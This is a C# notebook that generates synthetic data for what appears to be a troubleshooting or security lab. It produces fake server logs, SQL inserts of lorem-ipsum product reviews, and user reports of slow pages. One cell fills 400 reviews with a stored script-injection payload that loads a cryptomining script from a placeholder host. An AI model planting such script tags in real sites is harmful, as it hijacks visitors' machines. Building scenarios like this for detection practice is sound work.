# Generate fake server logs.

In [1]:
#r "Naminator.dll"

In [1]:
using Naminator;

In [1]:
using System.IO;
using System.Text;
using System.Text.Json;

var rand = new Random();
var timeRand = new Random();
var minDate = new DateTime(2015, 1, 1);
var endDate = new DateTime(2019, 12, 31);
var daysRange = (int)((endDate - minDate).TotalDays);
var productRand = new Random();

var productIds = File.ReadAllLines("./productids.txt");

string GetRandomProductId()
{
    return productIds[productRand.Next(productIds.Length - 1)];
}
string GetRandomDate()
{
    return minDate.AddDays(rand.Next(daysRange)).Date.ToString("yyyy-MM-dd HH:mm:ss");
}

In [1]:

public (string name, string lastName, string email) GenerateUser(){
    var name = Any.FirstName().Replace("'", " ");
    var lastName = Any.LastName().Replace("'", " ");
    var email = Any.Email();
    email = $"{name.Replace(" ", ".")}.{lastName.Replace(" ", ".")}@{email.Split('@').Last()}".ToLowerInvariant();
    return (name,lastName,email);
}

In [1]:
using System.IO;
using System.Text.Json;

var serializerOptions = new JsonSerializerOptions(JsonSerializerDefaults.General){
    WriteIndented = true,
    Encoder  = System.Text.Encodings.Web.JavaScriptEncoder.UnsafeRelaxedJsonEscaping 
};

In [1]:
public record LogLine(string url, string responseTimeMS);
var logLines = new List<LogLine>();

for (int i = 0; i < 1000; i++)
{
    var logLine = new LogLine(
        $"https://example.com/view/product/{GetRandomProductId()}",
        $"{timeRand.Next(4, 25)}"
    );
    logLines.Add(logLine);
}

File.WriteAllText("serverlog.json", JsonSerializer.Serialize(logLines,serializerOptions));

# Fake normal reviews.

In [1]:

var lorum = @"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.";
var words = lorum.Split(" ");

string GetComment()
{
    var count = rand.Next(words.Length);
    return string.Join(" ", words.Take(count));
}

var insertLines = new List<string>();
for (int i = 0; i < 950; i++)
{   
    var date = GetRandomDate();
    var (name, lastName, email) = GenerateUser();
    insertLines.Add($"({GetRandomProductId()}, '{name} {lastName}', '{date}', '{email}', {rand.Next(1, 5)}, '{GetComment()}', '{date}'),");
}

var sb = new StringBuilder();
sb.AppendLine("INSERT INTO [AdventureWorks2019].[Production].[ProductReview]([ProductID], [ReviewerName], [ReviewDate], [EmailAddress], [Rating], [Comments], [ModifiedDate])");
sb.AppendLine("VALUES");
sb.AppendLine(string.Join("\n", insertLines));

File.WriteAllText(@"..\sql\insert_review.sql", sb.ToString().TrimEnd().TrimEnd(','));

# Fake malicious reviews.

In [1]:
string GetComment()
{
    return "<script src=\"https://example.com/mine-crypto.js\"/>";
}

var troubleProducts = new HashSet<string>();

var insertLines = new List<string>();
for (int i = 0; i < 400; i++)
{
    var productId = GetRandomProductId();
    troubleProducts.Add(productId);
    var date = GetRandomDate();
    var (name, lastName, email) = GenerateUser();
    insertLines.Add($"({productId}, '{name} {lastName}', '{date}', '{email}', {rand.Next(1, 5)}, '{GetComment()}', '{date}'),");
}

var sb = new StringBuilder();
sb.AppendLine("INSERT INTO [AdventureWorks2019].[Production].[ProductReview]([ProductID], [ReviewerName], [ReviewDate], [EmailAddress], [Rating], [Comments], [ModifiedDate])");
sb.AppendLine("VALUES");
sb.AppendLine(string.Join("\n", insertLines));

File.WriteAllText(@"..\sql\insert_malicious_review.sql", sb.ToString().TrimEnd().TrimEnd(','));

# Generate report dump

In [1]:
public record Report (string date, string from, string reson, string url, string comment);

var reports = new List<Report>();

var serializerOptions = new JsonSerializerOptions(JsonSerializerDefaults.General ){
    WriteIndented = true,
    Encoder  = System.Text.Encodings.Web.JavaScriptEncoder.UnsafeRelaxedJsonEscaping 
   };
var ids = troubleProducts.ToList();

for (var i = 0; i <50; i++){
    var date = GetRandomDate();
    var (name, lastName, email) = GenerateUser();
    var productId = ids[rand.Next(ids.Count)];
    var report = new Report(
        date,
        email,
        "Slow page",
        $"https://example.com/view/product/{GetRandomProductId()}", 
        "I was researching products on your site and it was too slow; I'm going to use Amazon instead.");
    
        reports.Add(report);
}

File.WriteAllText(@".\report_export.json", JsonSerializer.Serialize(reports,serializerOptions));